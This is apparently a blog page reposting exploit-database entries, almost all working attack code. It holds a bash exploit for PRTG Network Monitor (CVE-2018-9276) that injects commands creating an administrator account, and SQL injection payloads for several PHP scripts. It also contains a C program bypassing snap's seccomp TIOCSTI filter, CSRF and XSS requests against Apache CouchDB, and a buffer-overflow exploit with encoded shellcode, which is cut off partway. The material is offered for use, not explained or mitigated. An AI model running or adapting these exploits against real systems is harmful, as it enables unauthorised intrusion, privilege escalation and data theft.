Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863591797

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
#!/bin/bash
echo -e "\n\e[00;33m[+]#########################################################################[+] \e[00m"
echo -e "\e[00;32m[*] Authenticated PRTG network Monitor remote code execution                [*] \e[00m"
echo -e "\e[00;33m[+]#########################################################################[+] \e[00m"
echo -e "\e[00;32m[*] Date: 11/03/2019                                                        [*] \e[00m"
echo -e "\e[00;33m[+]#########################################################################[+] \e[00m"
echo -e "\e[00;32m[*] Author: https://github.com/M4LV0   lorn3m4lvo@protonmail.com            [*] \e[00m"
echo -e "\e[00;33m[+]#########################################################################[+] \e[00m"
echo -e "\e[00;32m[*] Vendor Homepage: https://www.paessler.com/prtg                          [*] \e[00m"
echo -e "\e[00;32m[*] Version: 18.2.38                                                        [*] \e[00m"
echo -e "\e[00;32m[*] CVE: CVE-2018-9276                                                      [*] \e[00m"
echo -e "\e[00;32m[*] Reference: https://www.codewatch.org/blog/?p=453                        [*] \e[00m"
echo -e "\e[00;33m[+]#########################################################################[+] \e[00m"
echo -e "\n\e[00;32m# login to the app, default creds are prtgadmin/prtgadmin. once athenticated grab your cookie and use it with the script.\n# run the script to create a new user 'pentest' in the administrators group with password 'P3nT3st!' \e[00m\n"
echo -e "\e[00;33m[+]#########################################################################[+] \e[00m"


usage()
{
echo -e '\e[00;35m EXAMPLE USAGE:\e[00m\e[00;32m ./prtg-exploit.sh -u http://10.10.10.10 -c "_ga=GA1.4.XXXXXXX.XXXXXXXX; _gid=GA1.4.XXXXXXXXXX.XXXXXXXXXXXX; OCTOPUS1813713946=XXXXXXXXXXXXXXXXXXXXXXXXXXXXX; _gat=1" \e[00m\n'
}

create_file()
{
data="name_=create_file&tags_=&active_=1&schedule_=-1%7CNone%7C&postpone_=1&comments=&summode_=2&summarysubject_=%5B%25sitename%5D+%25summarycount+Summarized+Notifications&summinutes_=1&accessrights_=1&accessrights_=1&accessrights_201=0&active_1=0&addressuserid_1=-1&addressgroupid_1=-1&address_1=&subject_1=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&contenttype_1=text%2Fhtml&customtext_1=&priority_1=0&active_17=0&addressuserid_17=-1&addressgroupid_17=-1&message_17=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_8=0&addressuserid_8=-1&addressgroupid_8=-1&address_8=&message_8=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_2=0&eventlogfile_2=application&sender_2=PRTG+Network+Monitor&eventtype_2=error&message_2=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_13=0&sysloghost_13=&syslogport_13=514&syslogfacility_13=1&syslogencoding_13=1&message_13=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_14=0&snmphost_14=&snmpport_14=162&snmpcommunity_14=&snmptrapspec_14=0&messageid_14=0&message_14=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&senderip_14=&active_9=0&url_9=&urlsniselect_9=0&urlsniname_9=&postdata_9=&active_10=0&active_10=10&address_10=Demo+EXE+Notification+-+OutFile.bat&message_10=%22C%3A%5CUsers%5CPublic%5Ctester.txt%22&windowslogindomain_10=&windowsloginusername_10=&windowsloginpassword_10=&timeout_10=60&active_15=0&accesskeyid_15=&secretaccesskeyid_15=&arn_15=&subject_15=&message_15=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_16=0&isusergroup_16=1&addressgroupid_16=200%7CPRTG+Administrators&ticketuserid_16=100%7CPRTG+System+Administrator&subject_16=%25device+%25name+%25status+%25down+(%25message)&message_16=Sensor%3A+%25name%0D%0AStatus%3A+%25status+%25down%0D%0A%0D%0ADate%2FTime%3A+%25datetime+(%25timezone)%0D%0ALast+Result%3A+%25lastvalue%0D%0ALast+Message%3A+%25message%0D%0A%0D%0AProbe%3A+%25probe%0D%0AGroup%3A+%25group%0D%0ADevice%3A+%25device+(%25host)%0D%0A%0D%0ALast+Scan%3A+%25lastcheck%0D%0ALast+Up%3A+%25lastup%0D%0ALast+Down%3A+%25lastdown%0D%0AUptime%3A+%25uptime%0D%0ADowntime%3A+%25downtime%0D%0ACumulated+since%3A+%25cumsince%0D%0ALocation%3A+%25location%0D%0A%0D%0A&autoclose_16=1&objecttype=notification&id=new&targeturl=%2Fmyaccount.htm%3Ftabid%3D2"
fireone=$(curl -s -H "Referer: $url/editnotification.htm?id=new&tabid=1" "X-Requested-With: XMLHttpRequest" -X POST --data "$data" --cookie "$cookie" $url/editsettings)
# use bat file; save file to C:\Users\Public\tester.txt change accordingly
echo "$fireone"
echo -e "\e[00;32m [*] file created \e[00m"
}
ex_notify_1()
{
for i in range {0..50}; do
fireone=$(curl -s -H "Referer: $url/myaccount.htm?tabid=2" "X-Requested-With: XMLHttpRequest" -X POST --data "id=20$i" --cookie "$cookie" $url/api/notificationtest.htm)
# find the id value usually starts at 20.. but may need to change range accordingly
done
echo -e "\e[00;32m [*] sending notification wait....\e[00m"
}

create_user()
{
data2="name_=create_user&tags_=&active_=1&schedule_=-1%7CNone%7C&postpone_=1&comments=&summode_=2&summarysubject_=%5B%25sitename%5D+%25summarycount+Summarized+Notifications&summinutes_=1&accessrights_=1&accessrights_=1&accessrights_201=0&active_1=0&addressuserid_1=-1&addressgroupid_1=-1&address_1=&subject_1=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&contenttype_1=text%2Fhtml&customtext_1=&priority_1=0&active_17=0&addressuserid_17=-1&addressgroupid_17=-1&message_17=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_8=0&addressuserid_8=-1&addressgroupid_8=-1&address_8=&message_8=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_2=0&eventlogfile_2=application&sender_2=PRTG+Network+Monitor&eventtype_2=error&message_2=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_13=0&sysloghost_13=&syslogport_13=514&syslogfacility_13=1&syslogencoding_13=1&message_13=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_14=0&snmphost_14=&snmpport_14=162&snmpcommunity_14=&snmptrapspec_14=0&messageid_14=0&message_14=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&senderip_14=&active_9=0&url_9=&urlsniselect_9=0&urlsniname_9=&postdata_9=&active_10=0&active_10=10&address_10=Demo+EXE+Notification+-+OutFile.ps1&message_10=%22C%3A%5CUsers%5CPublic%5Ctester.txt%3Bnet+user+pentest+P3nT3st!+%2Fadd%22&windowslogindomain_10=&windowsloginusername_10=&windowsloginpassword_10=&timeout_10=60&active_15=0&accesskeyid_15=&secretaccesskeyid_15=&arn_15=&subject_15=&message_15=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_16=0&isusergroup_16=1&addressgroupid_16=200%7CPRTG+Administrators&ticketuserid_16=100%7CPRTG+System+Administrator&subject_16=%25device+%25name+%25status+%25down+(%25message)&message_16=Sensor%3A+%25name%0D%0AStatus%3A+%25status+%25down%0D%0A%0D%0ADate%2FTime%3A+%25datetime+(%25timezone)%0D%0ALast+Result%3A+%25lastvalue%0D%0ALast+Message%3A+%25message%0D%0A%0D%0AProbe%3A+%25probe%0D%0AGroup%3A+%25group%0D%0ADevice%3A+%25device+(%25host)%0D%0A%0D%0ALast+Scan%3A+%25lastcheck%0D%0ALast+Up%3A+%25lastup%0D%0ALast+Down%3A+%25lastdown%0D%0AUptime%3A+%25uptime%0D%0ADowntime%3A+%25downtime%0D%0ACumulated+since%3A+%25cumsince%0D%0ALocation%3A+%25location%0D%0A%0D%0A&autoclose_16=1&objecttype=notification&id=new&targeturl=%2Fmyaccount.htm%3Ftabid%3D2"
firetwo=$(curl -s -H "Referer: $url/editnotification.htm?id=new&tabid=1" "X-Requested-With: XMLHttpRequest" -X POST --data "$data2" --cookie "$cookie" $url/editsettings)
# use ps1 script to execute code; adding a new user with username pentest and password P3nT3st!
echo "$firetwo"
echo -e "\e[00;32m [*] adding a new user 'pentest' with password 'P3nT3st' \e[00m"
}

ex_notify_2()
{
for i in range {0..50}; do
fire2=$(curl -s -H "Referer: $url/myaccount.htm?tabid=2" "X-Requested-With: XMLHttpRequest" -X POST --data "id=20$i" --cookie "$cookie" $url/api/notificationtest.htm)
# find the id value usually starts at 20.. but may need to change range accordingly
done
echo -e "\e[00;32m [*] sending notification wait....\e[00m"
}

add_user_admin()
{
data3="name_=user_admin&tags_=&active_=1&schedule_=-1%7CNone%7C&postpone_=1&comments=&summode_=2&summarysubject_=%5B%25sitename%5D+%25summarycount+Summarized+Notifications&summinutes_=1&accessrights_=1&accessrights_=1&accessrights_201=0&active_1=0&addressuserid_1=-1&addressgroupid_1=-1&address_1=&subject_1=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&contenttype_1=text%2Fhtml&customtext_1=&priority_1=0&active_17=0&addressuserid_17=-1&addressgroupid_17=-1&message_17=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_8=0&addressuserid_8=-1&addressgroupid_8=-1&address_8=&message_8=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_2=0&eventlogfile_2=application&sender_2=PRTG+Network+Monitor&eventtype_2=error&message_2=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_13=0&sysloghost_13=&syslogport_13=514&syslogfacility_13=1&syslogencoding_13=1&message_13=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_14=0&snmphost_14=&snmpport_14=162&snmpcommunity_14=&snmptrapspec_14=0&messageid_14=0&message_14=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&senderip_14=&active_9=0&url_9=&urlsniselect_9=0&urlsniname_9=&postdata_9=&active_10=0&active_10=10&address_10=Demo+EXE+Notification+-+OutFile.ps1&message_10=%22C%3A%5CUsers%5CPublic%5Ctester.txt%3Bnet+localgroup+administrators+%2Fadd+pentest%22&windowslogindomain_10=&windowsloginusername_10=&windowsloginpassword_10=&timeout_10=60&active_15=0&accesskeyid_15=&secretaccesskeyid_15=&arn_15=&subject_15=&message_15=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_16=0&isusergroup_16=1&addressgroupid_16=200%7CPRTG+Administrators&ticketuserid_16=100%7CPRTG+System+Administrator&subject_16=%25device+%25name+%25status+%25down+(%25message)&message_16=Sensor%3A+%25name%0D%0AStatus%3A+%25status+%25down%0D%0A%0D%0ADate%2FTime%3A+%25datetime+(%25timezone)%0D%0ALast+Result%3A+%25lastvalue%0D%0ALast+Message%3A+%25message%0D%0A%0D%0AProbe%3A+%25probe%0D%0AGroup%3A+%25group%0D%0ADevice%3A+%25device+(%25host)%0D%0A%0D%0ALast+Scan%3A+%25lastcheck%0D%0ALast+Up%3A+%25lastup%0D%0ALast+Down%3A+%25lastdown%0D%0AUptime%3A+%25uptime%0D%0ADowntime%3A+%25downtime%0D%0ACumulated+since%3A+%25cumsince%0D%0ALocation%3A+%25location%0D%0A%0D%0A&autoclose_16=1&objecttype=notification&id=new&targeturl=%2Fmyaccount.htm%3Ftabid%3D2"
firethree=$(curl -s -H "Referer: $url/editnotification.htm?id=new&tabid=1" "X-Requested-With: XMLHttpRequest" -X POST --data "$data3" --cookie "$cookie" $url/editsettings)
echo "$firethree"
echo -e "\e[00;32m [*] adding a user pentest to the administrators group \e[00m"
}

ex_notify_3()
{
for i in range {0..50}; do
fire3=$(curl -s -H "Referer: $url/myaccount.htm?tabid=2" "X-Requested-With: XMLHttpRequest" -X POST --data "id=20$i" --cookie "$cookie" $url/api/notificationtest.htm)
# find the id value usually starts at 20.. but may need to change range accordingly
done
echo -e "\e[00;32m [*] sending notification wait....\e[00m"
echo -e "\n\n\e[00;32m [*] exploit completed new user 'pentest' with password 'P3nT3st!' created have fun! \e[00m"
}

if [[ $# -eq 0 ]] ; then
    usage
    exit 0
fi

while getopts "hu:c:" option; do
 case "${option}" in
    c) cookie=${OPTARG};;
    h) usage;;
    u) url=${OPTARG};;
    *) usage; exit;;
  esac
done

create_file
ex_notify_1
sleep 3
create_user
ex_notify_2
sleep 3
add_user_admin
ex_notify_3
HireHackking 
# Exploit Title: Matrimony Website Script - Multiple SQL Injection
# Date: 22.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.matri4web.com
# Demo Site: https://www.matrimonydemo.com
# Version: M-Plus
# Tested on: Kali Linux
# CVE: N/A

----- PoC 1: SQLi -----

Request: http://localhost/[PATH]/simplesearch_results.php
Vulnerable Parameter: txtGender (POST)
Attack Pattern:
Fage=18&Tage=18&caste=Any&religion=Any&submit=Submit&txtGender=-1'%20OR%203*2*1=6%20AND%20000715=000715%20--%20&txtphoto=1&txtprofile=0

----- PoC 2: SQLi -----

Request: http://localhost/[PATH]/advsearch_results.php
Vulnerable Parameter: religion (POST)
Attack Pattern:
age1=18&age2=18&caste[]=Any&cboCountry[]=&city[]=Any&edu[]=Any&ms=Unmarried&occu[]=Any&religion=-1'%20OR%203*2*1=6%20AND%20000723=000723%20--%20&state[]=Any&submit=Submit&txtGender=Male&txtphoto=Show%20profiles%20with%20Photo

----- PoC 3 - SQLi -----

Request: http://localhost/[PATH]/specialcase_results.php
Vulnerable Parameter: Fage
Attack Pattern:
Fage=(select(0)from(select(sleep(0)))v)/*'%2B(select(0)from(select(sleep(0)))v)%2B'"%2B(select(0)from(select(sleep(0)))v)%2B"*/&Tage=18&caste=Any&religion=Any&sp_cs=Any&submit=Submit&txtGender=Male&txtphoto=Show%20profiles%20with%20Photo&txtprofile=7

----- PoC 4 - SQLi -----

Request: http://localhost/[PATH]/locational_results.php
Vulnerable Parameter: cboCountry (POST)
Attack Pattern:
Fage=18&Tage=18&cboCountry=-1'%20OR%203*2*1=6%20AND%20000567=000567%20--%20&cboState=Any&city=Any&submit=Submit&txtCountry=Argentina&txtCountryLength=9&txtGender=Male&txtNumCountries=251&txtNumStates=25&txtSelectedCountry=9&txtSelectedState=10&txtState=Entre%20Rios&txtStateLength=10&txtphoto=Show%20profiles%20with%20Photo

----- PoC 5 - SQLi -----

Request: http://localhost/[PATH]/registration2.php
Vulnerable Parameter: religion (POST)
Attack Pattern:
EMAILconfirm=sample%40email.tst&Language=&dobDay=&dobMonth=&dobYear=&religion=-1'%20OR%203*2*1=6%20AND%20000830=000830%20--%20&submit=Submit&txtAccept=I%20Accept%20%20the%20Terms%20and%20Conditions&txtGender=Male&txtMC=&txtMobile=987-65-4329&txtName=FtkKDgHs&txtPC=Self&txtcp=1
HireHackking 
# Exploit Title: Bootstrapy CMS - Multiple SQL Injection
# Date: 21.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: http://bootstrapy.com
# Demo Site: http://bootstrapy.net/demo/
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A

----- PoC 1: SQLi -----

Request: http://localhost/[PATH]/modules/forums/forum-thread.php
Vulnerable Parameter: thread_id (POST)
Attack Patten:
search=&thread_id=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z

----- PoC 2: SQLi -----

Request: http://localhost/[PATH]/modules/pages/contact-submit.php
Vulnerable Parameter: subject (POST)
Attack Pattern:
email=sample%40email.tst&message=20&name=wUmrLVWz&subject=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z&submit=

----- PoC 3 - SQLi -----

Request: http://localhost/[PATH]/modules/forums/post-new-submit.php
Vulnerable Parameter: post-id
Attack Pattern:
body=1&post-id=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z&quote=1&submit=&thread-id=1

----- PoC 4 - SQLi -----

Request: http://localhost/[PATH]/modules/forums/post-new-submit.php
Vulnerable Parameter: thread-id (POST)
Attack Pattern:
quote=0&reply=1&submit=&thread-id=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z
HireHackking 
# Exploit Title: Meeplace Business Review Script - 'id' SQL Injection
# Date: 22.03.2019
# Dork:
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: http://www.meeplace.com
# Demo Site: http://demo.meeplace.com
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A

----- PoC: SQLi -----

# Request: http://localhost/[PATH]/ad/addclick.php?&id=1
# Vulnerable Parameter: id (GET)
# Payload: &id=1 RLIKE (SELECT * FROM (SELECT(SLEEP(5)))qcFZ)
HireHackking 
/*
snap uses a seccomp filter to prevent the use of the TIOCSTI ioctl; in the
source code, this filter is expressed as follows:

  # TIOCSTI allows for faking input (man tty_ioctl)
  # TODO: this should be scaled back even more
  ioctl - !TIOCSTI

In the X86-64 version of the compiled seccomp filter, this results in the
following BPF bytecode:

  [...]
  0139 if nr == 0x00000010: [true +0, false +3]
  013b   if args[1].high != 0x00000000: [true +205, false +0] -> ret ALLOW (syscalls: ioctl)
  0299   if args[1].low == 0x00005412: [true +111, false +112] -> ret ERRNO
  030a   ret ALLOW (syscalls: ioctl)
  [...]

This bytecode performs a 64-bit comparison; however, the syscall entry point for
ioctl() is defined with a 32-bit command argument in the kernel:

SYSCALL_DEFINE3(ioctl, unsigned int, fd, unsigned int, cmd, unsigned long, arg)
{
  return ksys_ioctl(fd, cmd, arg);
}

This means that setting a bit in the high half of the command parameter will
circumvent the seccomp filter while being ignored by the kernel.

This can be tested as follows on Ubuntu 18.04. You might have to launch the
GNOME calculator once first to create the snap directory hierarchy, I'm not
sure.

====================================================================
user@ubuntu-18-04-vm:~$ cat tiocsti.c
*/

#define _GNU_SOURCE
#include <termios.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <stdio.h>
#include <sys/syscall.h>
#include <errno.h>

static int ioctl64(int fd, unsigned long nr, void *arg) {
  errno = 0;
  return syscall(__NR_ioctl, fd, nr, arg);
}

int main(void) {
  int res;
  char pushmeback = '#';
  res = ioctl64(0, TIOCSTI, &pushmeback);
  printf("normal TIOCSTI: %d (%m)\n", res);
  res = ioctl64(0, TIOCSTI | (1UL<<32), &pushmeback);
  printf("high-bit-set TIOCSTI: %d (%m)\n", res);
}

/*
user@ubuntu-18-04-vm:~$ gcc -o tiocsti tiocsti.c -Wall
user@ubuntu-18-04-vm:~$ ./tiocsti
#normal TIOCSTI: 0 (Success)
#high-bit-set TIOCSTI: 0 (Success)
user@ubuntu-18-04-vm:~$ ##
user@ubuntu-18-04-vm:~$ cp tiocsti /home/user/snap/gnome-calculator/current/tiocsti
user@ubuntu-18-04-vm:~$ snap run --shell gnome-calculator
[...]
user@ubuntu-18-04-vm:/home/user$ cd
user@ubuntu-18-04-vm:~$ ./tiocsti
normal TIOCSTI: -1 (Operation not permitted)
#high-bit-set TIOCSTI: 0 (Success)
user@ubuntu-18-04-vm:~$ #
user@ubuntu-18-04-vm:~$ pwd
/home/user/snap/gnome-calculator/260
user@ubuntu-18-04-vm:~$ 
====================================================================
*/
HireHackking 
# Exploit Title: Inout Article Base CMS - SQL Injection
# Date: 21.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.inoutscripts.com/products/inout-article-base/
# Demo Site: http://www.inoutwebportal.com
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A

----- PoC 1: SQLi -----

Request: http://localhost/[PATH]/articles/portalLogin.php
Vulnerable Parameter: p (GET)
Attack Pattern:
http://locahost/[PATH]/articles/portalLogin.php?d=65ded5353c5ee48d0b7d48c591b8f430&p=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&u=test

----- PoC 2: SQLi -----

Request: http://localhost/[PATH]/articles/portalLogin.php
Vulnerable Parameter: u (GET)
Attack Pattern:
http://locahost/[PATH]/articles/portalLogin.php?d=65ded5353c5ee48d0b7d48c591b8f430&p=fe01ce2a7fbac8fafaed7c982a04e229&u=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z
HireHackking 
##################################################################################################################################
# Exploit Title: Apache CouchDB 2.3.1 | Cross-Site Request Forgery /
Cross-Site Scripting
# Date: 22.03.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: http://couchdb.apache.org
# Software Link: http://couchdb.apache.org/#download
# Version: 2.3.1
##################################################################################################################################

Introduction

A CouchDB server hosts named databases, which store documents. Each
document is uniquely named in the database, and CouchDB provides a RESTful
HTTP API for reading and updating (add, edit, delete) database documents.

#################################################################################

Vulnerabilities: CSRF | XSS DOM Based & Reflected & Stored

#################################################################################

CSRF1

Create Database

PUT /test HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 27
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249

{"id":"test","name":"test"}

#################################################################################

CSRF2

Delete Database

DELETE /test HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
content-type: application/json
pragma: no-cache
Origin: http://127.0.0.1:5984
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249
Cache-Control: max-age=0


#################################################################################

CSRF3

Create Document

POST /test/ HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 18
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249

{"testdoc":"test"}

#################################################################################

CSRF4

Create Admin

PUT /_node/couchdb@localhost/_config/admins/admin HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
content-type: application/json
pragma: no-cache
Origin: http://127.0.0.1:5984
Content-Length: 10
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249
Cache-Control: max-age=0

"password"


#################################################################################


CSRF5 & XSS1 | DOM Based & Stored - Add Option


PUT /_node/couchdb@localhost/_config/test/%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
content-type: application/json
pragma: no-cache
Origin: http://127.0.0.1:5984
Content-Length: 6
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249
Cache-Control: max-age=0

"test"

#################################################################################

CSRF6 & XSS2 | DOM Based & Stored - Delete Option

DELETE /_node/couchdb@localhost/_config/test/%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
content-type: application/json
pragma: no-cache
Origin: http://127.0.0.1:5984
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249
Cache-Control: max-age=0


#################################################################################
HireHackking 
#!/usr/bin/env python
#---------------------------------------------------------------------------------------------------------#
# Exploit: X-NetStat Pro 5.63 - Local Buffer Overflow (EggHunter)                                         #
# Date: 2019-03-23                                                                                        #
# Author: Peyman Forouzan                                                                                 #
# Tested Against: Winxp SP2 32-64 bit - Win7 Enterprise SP1 32-64 bit - Win10 Enterprise 32-64 bit        #
# Vendor Homepage: https://freshsoftware.com                                                              #
# Software Download : https://www.freshsoftware.com/files/xns56p_setup.exe                                #
# Version: 5.63                                                                                           #
# Special Thanks to my wife                                                                               #
# The program has Local Buffer Overflow in several places.                                                #
# Note: Although there are even more simple codes to this vulnerability,                                  #
# this technique (EggHunter) has been used to run vulnerability in different windows versions.            #
# Steps :                                                                                                 #
#  1- Run python code : X-NetStat.py ( Three files are created )                                          #
#  2- App --> Tools --> HTTP Client --> paste in contents from the egg.txt into "URL"                     #
#         --> Enter --> Close HTTP Client window.                                                         #
#  3- Rules --> Add New Rule --> Actions --> paste in contents from the egghunter-winxp-win7.txt          #
#     or egghunter-win10.txt (depend on your windows version) into "Run Program" --> Ok                   #
#     --> Wait a litle --> Shellcode (Calc) open                                                          #
# Also Instead of the third stage you can :                                                               #
#     File --> Import / Resolve bulk IP List ... --> paste in contents from the egghunter-winxp-win7.txt  #
#     or egghunter-win10.txt (depend on your windows version) into "IP List (One IP per Line)" -->        #
#     Then Press Open file (Folder) Icon --> Wait a litle --> Shellcode (Calc) open                       #
#---------------------------------------------------------------------------------------------------------#
# "Egg" shellcode into memory --> Egghunter field overflow: EIP overwrite                                 #
#---------------------------------------------------------------------------------------------------------#

#------------------------------------   EGG Shellcode Generation    ---------------------------------------

#msfvenom -p windows/exec cmd=calc.exe BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egg
# ( Can be replaced with Shellcode )
egg =  "w00tw00t"
egg += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egg += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
egg += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
egg += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
egg += "\x79\x6c\x5a\x48\x4e\x62\x77\x70\x57\x70\x63\x30\x71"
egg += "\x70\x4b\x39\x5a\x45\x35\x61\x4f\x30\x52\x44\x4c\x4b"
egg += "\x52\x70\x46\x50\x6c\x4b\x53\x62\x54\x4c\x6c\x4b\x43"
egg += "\x62\x44\x54\x6c\x4b\x71\x62\x51\x38\x34\x4f\x6e\x57"
egg += "\x31\x5a\x36\x46\x55\x61\x6b\x4f\x4c\x6c\x37\x4c\x75"
egg += "\x31\x73\x4c\x45\x52\x54\x6c\x77\x50\x49\x51\x48\x4f"
egg += "\x34\x4d\x53\x31\x69\x57\x39\x72\x4a\x52\x62\x72\x43"
egg += "\x67\x6e\x6b\x71\x42\x52\x30\x4c\x4b\x70\x4a\x47\x4c"
egg += "\x6e\x6b\x62\x6c\x62\x31\x72\x58\x6a\x43\x70\x48\x33"
egg += "\x31\x4e\x31\x52\x71\x4c\x4b\x36\x39\x37\x50\x63\x31"
egg += "\x5a\x73\x4c\x4b\x42\x69\x52\x38\x68\x63\x57\x4a\x31"
egg += "\x59\x4e\x6b\x44\x74\x4c\x4b\x55\x51\x38\x56\x50\x31"
egg += "\x6b\x4f\x6e\x4c\x69\x51\x78\x4f\x46\x6d\x36\x61\x58"
egg += "\x47\x46\x58\x4b\x50\x52\x55\x39\x66\x65\x53\x71\x6d"
egg += "\x79\x68\x45\x6b\x31\x6d\x45\x74\x34\x35\x7a\x44\x52"
egg += "\x78\x4c\x4b\x62\x78\x77\x54\x47\x71\x58\x53\x75\x36"
egg += "\x6c\x4b\x34\x4c\x70\x4b\x6c\x4b\x52\x78\x35\x4c\x43"
egg += "\x31\x58\x53\x6c\x4b\x73\x34\x6e\x6b\x67\x71\x58\x50"
egg += "\x6c\x49\x73\x74\x45\x74\x55\x74\x63\x6b\x61\x4b\x33"
egg += "\x51\x32\x79\x51\x4a\x36\x31\x49\x6f\x4b\x50\x71\x4f"
egg += "\x71\x4f\x42\x7a\x6c\x4b\x44\x52\x48\x6b\x6e\x6d\x31"
egg += "\x4d\x50\x6a\x35\x51\x6e\x6d\x6f\x75\x48\x32\x55\x50"
egg += "\x75\x50\x53\x30\x46\x30\x55\x38\x74\x71\x4c\x4b\x72"
egg += "\x4f\x4e\x67\x69\x6f\x6b\x65\x4d\x6b\x5a\x50\x38\x35"
egg += "\x79\x32\x56\x36\x45\x38\x59\x36\x6a\x35\x6f\x4d\x6f"
egg += "\x6d\x69\x6f\x59\x45\x35\x6c\x64\x46\x31\x6c\x76\x6a"
egg += "\x4b\x30\x79\x6b\x4b\x50\x74\x35\x73\x35\x4d\x6b\x73"
egg += "\x77\x65\x43\x71\x62\x32\x4f\x50\x6a\x75\x50\x31\x43"
egg += "\x39\x6f\x5a\x75\x55\x33\x43\x51\x72\x4c\x45\x33\x44"
egg += "\x6e\x62\x45\x31\x68\x62\x45\x63\x30\x41\x41"

f = open ("egg.txt", "w")
f.write(egg)
f.close()

#---------------------------------   EGG Hunter Shellcode Generation    -----------------------------------

#encode egghunter code produced by mona (looking for w00tw00t) into only alpha characters

# EggHunter - Modified Version for Winxp and Win7 (32-64 bit)
egghunter =  "\x4c\x4c\x4c\x4c\x5f"
egghunter += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egghunter += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
